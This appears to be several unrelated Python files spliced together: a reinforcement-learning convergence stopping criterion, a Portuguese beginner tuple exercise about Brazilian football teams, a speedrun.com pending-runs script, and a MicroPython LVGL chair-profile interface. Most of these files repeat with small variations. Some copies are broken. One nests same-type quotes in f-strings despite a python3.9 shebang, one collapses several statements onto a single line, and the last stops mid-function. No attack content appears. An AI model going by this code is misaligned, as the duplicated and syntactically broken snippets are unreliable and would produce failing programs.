        return_statistic: ReturnStatistic = ReturnStatistic.median,
        num_lookbacks: int = 1,
    ):
        """
        Constructor.

        :param convergence_probability_threshold: threshold of the p-value above which the algorithm is considered
            to be converged; defaults to `0.99`, i.e. a `99%` certainty that the data can be explained
        :param num_iter: number of iterations to use for the moving mode; if `None`, the cumulative mode is used
        :param return_statistic: statistic to compute; defaults to median
        :param num_lookbacks: over how many iterations the statistic should be computed; for example, a value of two
            means that the rollouts of both the current and the previous iteration will be used for computing the
            statistic; defaults to one
        """
        super().__init__(return_statistic, num_lookbacks)
        if not (num_iter is None or num_iter > 0):
            raise pyrado.ValueErr(msg="num_iter must be either None or a positive number.")
        self._convergence_probability_threshold = convergence_probability_threshold
        self._num_iter = num_iter
        self._return_statistic_history = []

    def __repr__(self) -> str:
        return (
            f"ConvergenceStoppingCriterion["
            f"convergence_probability_threshold={self._convergence_probability_threshold}, "
            f"num_iter={self._num_iter}, "
            f"return_statistic={self._return_statistic}, "
            f"num_lookbacks={self._num_lookbacks}, "
            f"return_statistic_history={self._return_statistic_history}]"
        )

    def __str__(self) -> str:
        return (
            f"({self._return_statistic} return converged, {'cumulative' if self._num_iter is None else 'moving'} mode)"
        )

    def _reset(self) -> NoReturn:
        self._return_statistic_history = []

    def _is_met_with_return_statistic(self, algo, sampler: RolloutSavingWrapper, return_statistic: float) -> bool:
        """Returns whether the convergence probability is greater than or equal to the threshold."""
        self._return_statistic_history.append(return_statistic)
        convergence_prob = self._compute_convergence_probability()
        if convergence_prob is None:
            return False
        return convergence_prob >= self._convergence_probability_threshold

    def _compute_convergence_probability(self) -> Optional[float]:
        """
        Computes the convergence probability for the current data. By invoking
        `_get_relevant_return_statistic_subset`, the two modes (moving and cumulative) are implemented. If not
        enough data is present, this method does not return the probability, but `None`.

        .. note::
            This invokes the method `linregress` of `scipy.stats` and returns the corresponding p-value.

        .. seealso::
            https://docs.scipy.org/doc/scipy/reference/generated/scipy.stats.linregress.html

        :return: the convergence probability, or `None` if not enough data is present
        """
        statistic_subset = self._get_relevant_return_statistic_subset()
        if statistic_subset is None:
            return None
        return sp.stats.linregress(range(len(statistic_subset)), statistic_subset).pvalue

    def _get_relevant_return_statistic_subset(self) -> Optional[List[float]]:
        """
        Extracts the relevant subset of the return statistic history, implementing the two modes described in the
        class documentation: moving and cumulative. If the return history is empty or does not yet contain `M`
        elements, `None` is returned. The convergence checking method shall treat this as the convergence criterion
        not being met, as there is not enough data.

        :return: the relevant subset
        """
        if len(self._return_statistic_history) <= 0:
            return None
        if self._num_iter is None:
            return self._return_statistic_history
        if len(self._return_statistic_history) < self._num_iter:
            return None
        return self._return_statistic_history[-self._num_iter :]
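# A self-contained sketch of the convergence test used by
# `ConvergenceStoppingCriterion` above: fit a line to the return history and
# read off the p-value of the Wald test (null hypothesis: the slope is zero).
# The two curves below are made up for illustration.

import numpy as np
from scipy import stats

noisy_plateau = 100 + np.random.default_rng(0).normal(0, 1, size=50)  # converged
rising = np.linspace(0, 100, num=50)                                  # still improving

p_plateau = stats.linregress(range(50), noisy_plateau).pvalue
p_rising = stats.linregress(range(50), rising).pvalue

# A flat, noisy curve typically yields a large p-value ("probably converged"),
# while a clearly rising curve yields a p-value at (or near) zero.
assert p_plateau > p_rising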
# 73
# Create a tuple filled with the first 20 teams of the Brazilian Football Championship
# (Campeonato Brasileiro) table, in order of placement. Then show: a) The first 5 teams.
# b) The last 4 teams. c) The teams in alphabetical order. d) The position of Chapecoense.

times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
         'Chapecoense', 'Atlético', 'Botafogo', 'Altético-PR', 'Bahia', 'São Paulo', 'Fluminense',
         'Sport Recife', 'EC Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')

## Another way to display the list of teams
# print('Lista de times do Brasileirão: ', end='')
# for t in times:
#     print(t, end=', ')

# print('-=' * 50)
# print(f'Lista de times do Brasileirão: {times}.')
# print('-=' * 50)
# print(f'Os 5 primeiros são: {times[0:5]}.')
# print('-=' * 50)
# print(f'Os 4 últimos são: {times[-4:]}.')
# print('-=' * 50)
# print(f'Times em ordem alfabética: {sorted(times)}.')
# print('-=' * 50)
# print(f'A Chapecoense está na {times.index('Chapecoense')+1}ª posição.')
# print('-=' * 50)

# 2nd form - with a menu
from time import sleep

while True:
    print('-=' * 25)
    print('\t\t\33[32mBRASILEIRÃO\33[m')
    print('-=' * 25)
    opc = input(
        '[1] - Mostrar a classificacao\n'
        '[2] - Mostrar os 5 primeiros\n'
        '[3] - Mostrar os 4 últimos\n'
        '[4] - Times em ordem alfabetica\n'
        '[5] - Posicao da Chapecoense\n'
        '[6] - Sair\n'
        'Escolha uma opção: ')
    while opc not in '123456':
        print('Opcao invalida.')
        # keep opc as a string: the membership test above and the menu
        # comparisons below all work with the characters '1'..'6'
        opc = input(
            '[1] - Mostrar a classificacao\n'
            '[2] - Mostrar os 5 primeiros\n'
            '[3] - Mostrar os 4 últimos\n'
            '[4] - Times em ordem alfabetica\n'
            '[5] - Posicao da Chapecoense\n'
            '[6] - Sair\n'
            'Escolha uma opção: ')
    if opc == '1':
        print('Lista de times do Brasileirão: ')
        for pos, c in enumerate(times):
            print(f' {pos+1} {c}')
    if opc == '2':
        print('Os 5 primeiros são: ')
        for pos, cont in enumerate(times[0:5]):
            print(f'{pos+1} {cont}')
    if opc == '3':
        print('Os 4 últimos são: ')
        for z4 in times[-4:]:
            print(f'{z4}')
    if opc == '4':
        print('Times em ordem alfabética: ', end='')
        print(sorted(times))
    if opc == '5':
        print('A Chapecoense está na ', end='')
        for pos, c in enumerate(times):
            if c == 'Chapecoense':
                print(f'{pos+1}ª posição.')
    if opc == '6':
        print('Você escolheu sair do programa.')
        break
    resp = str(input('\nQuer Continuar? [S/N] ')).upper().strip()[0]
    while resp not in 'SN':
        print('\33[31mOpção inválida\33[m')
        resp = str(input('Quer Continuar? [S/N] ')).upper().strip()[0]
    if resp == 'N':
        break
    print('\n')
    sleep(0.5)
print('Desligando...')
# 73
# Create a tuple filled with the first 20 teams of the Brazilian Football Championship
# (Campeonato Brasileiro) table, in order of placement. Then show: a) The first 5 teams.
# b) The last 4 teams. c) The teams in alphabetical order. d) The position of Chapecoense.

times = ('Corinthians', 'Palmeiras', 'Santos', 'Grêmio', 'Cruzeiro', 'Flamengo', 'Vasco',
         'Chapecoense', 'Atlético', 'Botafogo', 'Altético-PR', 'Bahia', 'São Paulo', 'Fluminense',
         'Sport Recife', 'EC Vitória', 'Coritiba', 'Avaí', 'Ponte Preta', 'Atlético-GO')

## Another way to display the list of teams
# print('Lista de times do Brasileirão: ', end='')
# for t in times:
#     print(t, end=', ')

# print('-=' * 50)
# print(f'Lista de times do Brasileirão: {times}.')
# print('-=' * 50)
# print(f'Os 5 primeiros são: {times[0:5]}.')
# print('-=' * 50)
# print(f'Os 4 últimos são: {times[-4:]}.')
# print('-=' * 50)
# print(f'Times em ordem alfabética: {sorted(times)}.')
# print('-=' * 50)
# print(f'A Chapecoense está na {times.index("Chapecoense")+1}ª posição.')
# print('-=' * 50)

# 2nd form - with a menu
from time import sleep

while True:
    print('-=' * 25)
    print('\t\t\33[32mBRASILEIRÃO\33[m')
    print('-=' * 25)
    opc = input(
        '[1] - Mostrar a classificacao\n'
        '[2] - Mostrar os 5 primeiros\n'
        '[3] - Mostrar os 4 últimos\n'
        '[4] - Times em ordem alfabetica\n'
        '[5] - Posicao da Chapecoense\n'
        '[6] - Sair\n'
        'Escolha uma opção: ')
    while opc not in '123456':
        print('Opcao invalida.')
        # keep opc as a string: the membership test above and the menu
        # comparisons below all work with the characters '1'..'6'
        opc = input(
            '[1] - Mostrar a classificacao\n'
            '[2] - Mostrar os 5 primeiros\n'
            '[3] - Mostrar os 4 últimos\n'
            '[4] - Times em ordem alfabetica\n'
            '[5] - Posicao da Chapecoense\n'
            '[6] - Sair\n'
            'Escolha uma opção: ')
    if opc == '1':
        print('Lista de times do Brasileirão: ')
        for pos, c in enumerate(times):
            print(f' {pos+1} {c}')
    if opc == '2':
        print('Os 5 primeiros são: ')
        for pos, cont in enumerate(times[0:5]):
            print(f'{pos+1} {cont}')
    if opc == '3':
        print('Os 4 últimos são: ')
        for z4 in times[-4:]:
            print(f'{z4}')
    if opc == '4':
        print('Times em ordem alfabética: ', end='')
        print(sorted(times))
    if opc == '5':
        print('A Chapecoense está na ', end='')
        for pos, c in enumerate(times):
            if c == 'Chapecoense':
                print(f'{pos+1}ª posição.')
    if opc == '6':
        print('Você escolheu sair do programa.')
        break
    resp = str(input('\nQuer Continuar? [S/N] ')).upper().strip()[0]
    while resp not in 'SN':
        print('\33[31mOpção inválida\33[m')
        resp = str(input('Quer Continuar? [S/N] ')).upper().strip()[0]
    if resp == 'N':
        break
    print('\n')
    sleep(0.5)
print('Desligando...')
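# For reference, a minimal sketch of the tuple operations this exercise
# relies on, using a made-up three-team tuple:

teams = ('Alfa', 'Beta', 'Gama')
assert teams[0:2] == ('Alfa', 'Beta')              # slicing: the first N items
assert teams[-2:] == ('Beta', 'Gama')              # slicing: the last N items
assert sorted(teams) == ['Alfa', 'Beta', 'Gama']   # alphabetical order (as a list)
assert teams.index('Gama') + 1 == 3                # 1-based position of an item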
#!/usr/bin/env python3.9

"""
This program returns a complete list of all the runs awaiting verification
for a given game (argv[1]) and optionally a second given game (argv[2]).
"""
from datetime import timedelta
from sys import argv, exit, stderr
from traceback import print_exception
from typing import Literal

from utils import *

USAGE = (
    "Usage: `+pending [GAME] [GAME (Optional)]`\n"
    + "Example: `+pending mkw mkwextracategories`"
)


def get_pending(game: str) -> list[dict]:
    _, gid = getgame(game)
    r = api_get(
        f"{API}/runs",
        params={
            "game": gid,
            "status": "new",
            "max": 200,
            "embed": "category,players,level",
            "orderby": "submitted",
        },
    )
    runs: list[dict] = []
    while True:
        runs.extend(r["data"])
        if "pagination" not in r or r["pagination"]["size"] < 200:
            break
        r = api_get(
            {item["rel"]: item["uri"] for item in r["pagination"]["links"]}["next"],
        )
    return runs


def main() -> int:
    if not (1 < len(argv) < 4):
        usage(USAGE)
    runs: list[dict] = []
    for game in argv[1:]:
        runs.extend(get_pending(game))
    if not runs:
        print("No pending runs found")
        return EXIT_SUCCESS
    print(
        "\n".join(
            f"[{run["level"]["data"]["name"] + ": " + run["category"]["data"]["name"] if run["level"]["data"] else run["category"]["data"]["name"]}]({run["weblink"]})"
            f" in `{str(timedelta(seconds=run["times"]["primary_t"])).replace("000","")}` by"
            f" {" and ".join([ player["name"] if player["rel"] == "guest" else player["names"]["international"] for player in run["players"]["data"]])}"
            for run in runs
        )
    )
    return EXIT_SUCCESS


if __name__ == "__main__":
    exit(main())
#!/usr/bin/env python3.9

"""
This program returns a complete list of all the runs awaiting verification
for a given game (argv[1]) and optionally a second given game (argv[2]).
"""
from datetime import timedelta
from sys import argv, exit, stderr
from traceback import print_exception
from typing import Literal

from utils import *

USAGE = (
    "Usage: `+pending [GAME] [GAME (Optional)]`\n"
    + "Example: `+pending mkw mkwextracategories`"
)


def get_pending(game: str) -> list[dict]:
    _, gid = getgame(game)
    r = api_get(
        f"{API}/runs",
        params={
            "game": gid,
            "status": "new",
            "max": 200,
            "embed": "category,players,level",
            "orderby": "submitted",
        },
    )
    runs: list[dict] = []
    while True:
        runs.extend(r["data"])
        if "pagination" not in r or r["pagination"]["size"] < 200:
            break
        r = api_get(
            {item["rel"]: item["uri"] for item in r["pagination"]["links"]}["next"],
        )
    return runs


def main() -> int:
    if not (1 < len(argv) < 4):
        usage(USAGE)
    runs: list[dict] = []
    for game in argv[1:]:
        runs.extend(get_pending(game))
    if not runs:
        print("No pending runs found")
        return EXIT_SUCCESS
    print(
        "\n".join(
            f"[{run['level']['data']['name'] + ': ' + run['category']['data']['name'] if run['level']['data'] else run['category']['data']['name']}]({run['weblink']})"
            f" in `{str(timedelta(seconds=run['times']['primary_t'])).replace('000','')}` by"
            f" {' and '.join([ player['name'] if player['rel'] == 'guest' else player['names']['international'] for player in run['players']['data']])}"
            for run in runs
        )
    )
    return EXIT_SUCCESS


if __name__ == "__main__":
    exit(main())
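# For reference, a generic version of the pagination loop above written
# directly against `requests` (this script's `api_get` helper is assumed to
# wrap something similar). It follows the "next" link advertised in the
# response's `pagination.links` until a short page signals the last one.

import requests

def fetch_all(url: str, params: dict = None, page_size: int = 200) -> list[dict]:
    items: list[dict] = []
    r = requests.get(url, params={**(params or {}), "max": page_size}).json()
    while True:
        items.extend(r["data"])
        pagination = r.get("pagination", {})
        if pagination.get("size", 0) < page_size:
            break  # a partial (or missing) page means there is no next page
        links = {link["rel"]: link["uri"] for link in pagination["links"]}
        r = requests.get(links["next"]).json()
    return items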
import lvgl as lv
import ujson as json
from cdp import fsm, group, scr, _users_list, motor_pines, turn_counter
from cdp.classes import Usuario
from utime import sleep, sleep_ms
import lodepng as png
from imagetools import get_png_info, open_png


def draw_calib_screen(which):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(75, 16)
    h.set_text("Calibrando...")
    i = lv.label(scr)
    i.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    if which == 'bar':
        i.set_pos(40, 120)
        i.set_text("Instrucciones de barra")
    elif which == 'assheight':
        i.set_pos(55, 120)
        i.set_text("Instrucciones de \naltura de asiento")
    elif which == 'assdepth':
        i.set_pos(35, 120)
        i.set_text("Instrucciones de \nprofundidad de asiento")
    elif which == 'lumbar':
        i.set_pos(30, 120)
        i.set_text("Instrucciones de lumbar")
    elif which == 'cabezal':
        i.set_pos(30, 120)
        i.set_text("Instrucciones de cabezal")
    elif which == 'apbrazo':
        i.set_pos(10, 120)
        i.set_text("Instrucciones de apoyabrazos")
    s = lv.spinner(scr, 2000, 40)
    s.set_size(60, 60)
    s.set_pos(85, 200)
    lv.scr_load(scr)


from cdp.helper import setup_motors_to_position

with open('008-man.png', 'rb') as i:
    png_data = i.read()

png_img_dsc = lv.img_dsc_t({
    'data_size': len(png_data),
    'data': png_data
})

raw_dsc = lv.img_dsc_t()
get_png_info(None, png_img_dsc, raw_dsc.header)
dsc = lv.img_decoder_dsc_t({'src': png_img_dsc})
if open_png(None, dsc) == lv.RES.OK:
    raw_dsc.data = dsc.img_data
    raw_dsc.data_size = raw_dsc.header.w * raw_dsc.header.h * lv.color_t.__SIZE__


# ===== CALLBACKS ===== #
def users_cb(event):
    draw_users_screen(_users_list)


def calibration_cb(event):
    fsm.State = 2  # CALIBRATING


def calib_name_cb(event, new_pos, kb):
    username = kb.get_textarea().get_text()
    new_user = Usuario(username, '008-man.png', new_pos)
    _users_list.append(new_user)
    group.set_editing(False)
    fsm.State = 3  # CALIBRATION_END


def profile_cb(event, username, usericon):
    draw_edit_screen(username, usericon)


def delete_user_cb(event, username, usericon):
    draw_delete_screen(username, usericon)


def select_profile_cb(event, username, usericon):
    draw_profilewait_screen(username, usericon)
    for user in _users_list:
        if user.nombre == username:
            print(f"Configurando {username}")
            setup_motors_to_position(motor_pines['Atras'], turn_counter)
            setup_motors_to_position(motor_pines['Adelante'], turn_counter, user.dict_posicion)
    fsm.State = 4


def edit_user_name_cb(event, username, usericon):
    draw_editname_screen(username, usericon)
    group.set_editing(False)


def edit_profile_name_cb(event, username, usericon, kb):
    new_username = kb.get_textarea().get_text()
    draw_profilewait_screen(new_username, usericon)
    for i, user in enumerate(_users_list):
        if user.nombre == username:
            user.edit(new_username, usericon)
    group.set_editing(False)
    draw_edit_screen(new_username, usericon)


def delete_profile_cb(event, username, usericon):
    draw_profilewait_screen(username, usericon)
    for i, user in enumerate(_users_list):
        if user.nombre == username:
            user.delete()
            del _users_list[i]
    fsm.State = 4


# ===== DRAW SCREENS ===== #
def draw_edit_screen(username, usericon):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h1 = lv.label(scr)
    h1.set_pos(96, 16)
    h1.set_text("Perfil")
    h1 = lv.label(scr)
    h1.set_pos(145, 80)
    h1.set_text(username)
    img = lv.img(scr)
    img.set_pos(40, 72)
    img.set_zoom(256+256)
    img.set_src(raw_dsc)
    # Add the buttons
    btn = lv.btn(scr)
    btn.set_pos(16, 150)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, lambda e: select_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.OK + " Seleccionar perfil")
    lv.group_t.add_obj(group, btn)
    btn = lv.btn(scr)
    btn.set_pos(16, 190)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, lambda e: edit_user_name_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.EDIT + " Editar nombre")
    lv.group_t.add_obj(group, btn)
    btn = lv.btn(scr)
    btn.set_pos(16, 230)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, users_cb, lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.LEFT + " Volver atras")
    lv.group_t.add_obj(group, btn)
    btn = lv.btn(scr)
    btn.set_pos(16, 270)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, lambda e: delete_user_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.TRASH + " Borrar perfil")
    lv.group_t.add_obj(group, btn)
    lv.scr_load(scr)


def draw_editname_screen(username, usericon):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(65, 16)
    h.set_text("Editar nombre")
    name_ta = lv.textarea(scr)
    name_ta.set_placeholder_text("Nuevo nombre")
    name_ta.set_one_line(True)
    name_ta.set_pos(20, 45)
    name_ta.set_width(200)
    btn = lv.btn(scr)
    btn.set_pos(65, 110)
    lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text("Volver atras")
    kb = lv.keyboard(scr)
    kb.add_event_cb(lambda e: edit_profile_name_cb(e, username, usericon, kb), lv.EVENT.READY, None)
    kb.set_size(240, 320 // 2)
    kb.set_textarea(name_ta)
    group.add_obj(name_ta)
    group.add_obj(btn)
    group.add_obj(kb)
    lv.scr_load(scr)


def draw_delete_screen(username, usericon):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(75, 16)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text(f"Borrar perfil\n\n{lv.SYMBOL.WARNING + " " + username + " " + lv.SYMBOL.WARNING}")
    h = lv.label(scr)
    h.set_pos(25, 80)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Esta accion es irreversible.\nConfirme su eleccion.")
    btn = lv.btn(scr)
    btn.set_pos(20, 140)
    lv.btn.add_event_cb(btn, lambda e: delete_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text("Borrar")
    group.add_obj(btn)
    btn = lv.btn(scr)
    btn.set_pos(132, 140)
    lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text("Cancelar")
    group.add_obj(btn)
    lv.scr_load(scr)


def draw_profilewait_screen(username, usericon):
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(70, 16)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Configuracion")
    h = lv.label(scr)
    h.set_pos(25, 120)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Por favor, espere mientras\n se configura este perfil:")
    h = lv.label(scr)
    h.set_pos(145, 208)
    h.set_text(username)
    # Load the PNG image
    img = lv.img(scr)
    img.set_pos(40, 200)
    img.set_zoom(256+256)
    img.set_src(raw_dsc)
    lv.scr_load(scr)


def draw_users_screen(users):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(90, 15)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Usuarios")
    h = lv.label(scr)
    h.set_pos(64, 75)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Seleccione uno")
    panel = lv.obj(scr)
    panel.set_pos(10, 100)
    panel.set_size(220, 190)
    panel.set_scroll_snap_x(lv.SCROLL_SNAP.CENTER)
    panel.set_flex_flow(lv.FLEX_FLOW.ROW)
    for user in users:
        btn = lv.btn(panel)
        btn.set_size(150, 150)
        btn.center()
        # Bind the current user via a default argument: a plain closure would
        # capture the loop variable late, so every button would open the last user.
        lv.btn.add_event_cb(btn, lambda e, u=user: profile_cb(e, u.nombre, u.icon), lv.EVENT.PRESSED, None)
        label = lv.label(btn)
label.set_text(user.nombre) label.center() group.add_obj(btn) btn = lv.btn(panel) btn.set_size(150, 150) btn.center() lv.btn.add_event_cb(btn, lambda e: calibration_cb(e), lv.EVENT.PRESSED, None) label = lv.label(btn) label.set_text(lv.SYMBOL.PLUS) label.center() group.add_obj(btn) panel.update_snap(lv.ANIM.ON) lv.scr_load(scr) def draw_calibname_screen(new_pos): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(65, 16) h.set_text("Elegir nombre") name_ta = lv.textarea(scr) name_ta.set_placeholder_text("Nuevo perfil") name_ta.set_one_line(True) name_ta.set_pos(20, 45) name_ta.set_width(200) kb = lv.keyboard(scr) kb.add_event_cb(lambda e: calib_name_cb(e, new_pos, kb), lv.EVENT.READY, None) kb.set_size(240, 320 // 2) kb.set_textarea(name_ta) group.add_obj(name_ta) group.add_obj(kb) lv.scr_load(scr) def draw_loading_screen(): group.remove_all_objs() lv.obj.clean(scr) h = lv.label(scr) h.set_pos(95, 16) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("C.D.P.") s = lv.spinner(scr, 1000, 60) s.set_size(100, 100) s.center() h = lv.label(scr) h.set_pos(85, 220) h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0) h.set_text("Cargando...") lv.scr_load(scr)
import lvgl as lv
import ujson as json
from cdp import fsm, group, scr, _users_list, motor_pines, turn_counter
from cdp.classes import Usuario
from utime import sleep, sleep_ms
import lodepng as png
from imagetools import get_png_info, open_png


def draw_calib_screen(which):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(75, 16)
    h.set_text("Calibrando...")
    i = lv.label(scr)
    i.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    if which == 'bar':
        i.set_pos(40, 120)
        i.set_text("Instrucciones de barra")
    elif which == 'assheight':
        i.set_pos(55, 120)
        i.set_text("Instrucciones de \naltura de asiento")
    elif which == 'assdepth':
        i.set_pos(35, 120)
        i.set_text("Instrucciones de \nprofundidad de asiento")
    elif which == 'lumbar':
        i.set_pos(30, 120)
        i.set_text("Instrucciones de lumbar")
    elif which == 'cabezal':
        i.set_pos(30, 120)
        i.set_text("Instrucciones de cabezal")
    elif which == 'apbrazo':
        i.set_pos(10, 120)
        i.set_text("Instrucciones de apoyabrazos")
    s = lv.spinner(scr, 2000, 40)
    s.set_size(60, 60)
    s.set_pos(85, 200)
    lv.scr_load(scr)


from cdp.helper import setup_motors_to_position

with open('008-man.png', 'rb') as i:
    png_data = i.read()

png_img_dsc = lv.img_dsc_t({
    'data_size': len(png_data),
    'data': png_data
})

raw_dsc = lv.img_dsc_t()
get_png_info(None, png_img_dsc, raw_dsc.header)
dsc = lv.img_decoder_dsc_t({'src': png_img_dsc})
if open_png(None, dsc) == lv.RES.OK:
    raw_dsc.data = dsc.img_data
    raw_dsc.data_size = raw_dsc.header.w * raw_dsc.header.h * lv.color_t.__SIZE__


# ===== CALLBACKS ===== #
def users_cb(event):
    draw_users_screen(_users_list)


def calibration_cb(event):
    fsm.State = 2  # CALIBRATING


def calib_name_cb(event, new_pos, kb):
    username = kb.get_textarea().get_text()
    new_user = Usuario(username, '008-man.png', new_pos)
    _users_list.append(new_user)
    group.set_editing(False)
    fsm.State = 3  # CALIBRATION_END


def profile_cb(event, username, usericon):
    draw_edit_screen(username, usericon)


def delete_user_cb(event, username, usericon):
    draw_delete_screen(username, usericon)


def select_profile_cb(event, username, usericon):
    draw_profilewait_screen(username, usericon)
    for user in _users_list:
        if user.nombre == username:
            print(f"Configurando {username}")
            setup_motors_to_position(motor_pines['Atras'], turn_counter)
            setup_motors_to_position(motor_pines['Adelante'], turn_counter, user.dict_posicion)
    fsm.State = 4


def edit_user_name_cb(event, username, usericon):
    draw_editname_screen(username, usericon)
    group.set_editing(False)


def edit_profile_name_cb(event, username, usericon, kb):
    new_username = kb.get_textarea().get_text()
    draw_profilewait_screen(new_username, usericon)
    for i, user in enumerate(_users_list):
        if user.nombre == username:
            user.edit(new_username, usericon)
    group.set_editing(False)
    draw_edit_screen(new_username, usericon)


def delete_profile_cb(event, username, usericon):
    draw_profilewait_screen(username, usericon)
    for i, user in enumerate(_users_list):
        if user.nombre == username:
            user.delete()
            del _users_list[i]
    fsm.State = 4


# ===== DRAW SCREENS ===== #
def draw_edit_screen(username, usericon):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h1 = lv.label(scr)
    h1.set_pos(96, 16)
    h1.set_text("Perfil")
    h1 = lv.label(scr)
    h1.set_pos(145, 80)
    h1.set_text(username)
    img = lv.img(scr)
    img.set_pos(40, 72)
    img.set_zoom(256+256)
    img.set_src(raw_dsc)
    # Add the buttons
    btn = lv.btn(scr)
    btn.set_pos(16, 150)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, lambda e: select_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.OK + " Seleccionar perfil")
    lv.group_t.add_obj(group, btn)
    btn = lv.btn(scr)
    btn.set_pos(16, 190)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, lambda e: edit_user_name_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.EDIT + " Editar nombre")
    lv.group_t.add_obj(group, btn)
    btn = lv.btn(scr)
    btn.set_pos(16, 230)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, users_cb, lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.LEFT + " Volver atras")
    lv.group_t.add_obj(group, btn)
    btn = lv.btn(scr)
    btn.set_pos(16, 270)
    btn.set_width(200)
    lv.btn.add_event_cb(btn, lambda e: delete_user_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text(lv.SYMBOL.TRASH + " Borrar perfil")
    lv.group_t.add_obj(group, btn)
    lv.scr_load(scr)


def draw_editname_screen(username, usericon):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(65, 16)
    h.set_text("Editar nombre")
    name_ta = lv.textarea(scr)
    name_ta.set_placeholder_text("Nuevo nombre")
    name_ta.set_one_line(True)
    name_ta.set_pos(20, 45)
    name_ta.set_width(200)
    btn = lv.btn(scr)
    btn.set_pos(65, 110)
    lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text("Volver atras")
    kb = lv.keyboard(scr)
    kb.add_event_cb(lambda e: edit_profile_name_cb(e, username, usericon, kb), lv.EVENT.READY, None)
    kb.set_size(240, 320 // 2)
    kb.set_textarea(name_ta)
    group.add_obj(name_ta)
    group.add_obj(btn)
    group.add_obj(kb)
    lv.scr_load(scr)


def draw_delete_screen(username, usericon):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(75, 16)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text(f"Borrar perfil\n\n{lv.SYMBOL.WARNING + ' ' + username + ' ' + lv.SYMBOL.WARNING}")
    h = lv.label(scr)
    h.set_pos(25, 80)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Esta accion es irreversible.\nConfirme su eleccion.")
    btn = lv.btn(scr)
    btn.set_pos(20, 140)
    lv.btn.add_event_cb(btn, lambda e: delete_profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text("Borrar")
    group.add_obj(btn)
    btn = lv.btn(scr)
    btn.set_pos(132, 140)
    lv.btn.add_event_cb(btn, lambda e: profile_cb(e, username, usericon), lv.EVENT.PRESSED, None)
    label = lv.label(btn)
    label.set_text("Cancelar")
    group.add_obj(btn)
    lv.scr_load(scr)


def draw_profilewait_screen(username, usericon):
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(70, 16)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Configuracion")
    h = lv.label(scr)
    h.set_pos(25, 120)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Por favor, espere mientras\n se configura este perfil:")
    h = lv.label(scr)
    h.set_pos(145, 208)
    h.set_text(username)
    # Load the PNG image
    img = lv.img(scr)
    img.set_pos(40, 200)
    img.set_zoom(256+256)
    img.set_src(raw_dsc)
    lv.scr_load(scr)


def draw_users_screen(users):
    group.remove_all_objs()
    lv.obj.clean(scr)
    h = lv.label(scr)
    h.set_pos(90, 15)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Usuarios")
    h = lv.label(scr)
    h.set_pos(64, 75)
    h.set_style_text_align(lv.TEXT_ALIGN.CENTER, 0)
    h.set_text("Seleccione uno")
    panel = lv.obj(scr)
    panel.set_pos(10, 100)
    panel.set_size(220, 190)
    panel.set_scroll_snap_x(lv.SCROLL_SNAP.CENTER)
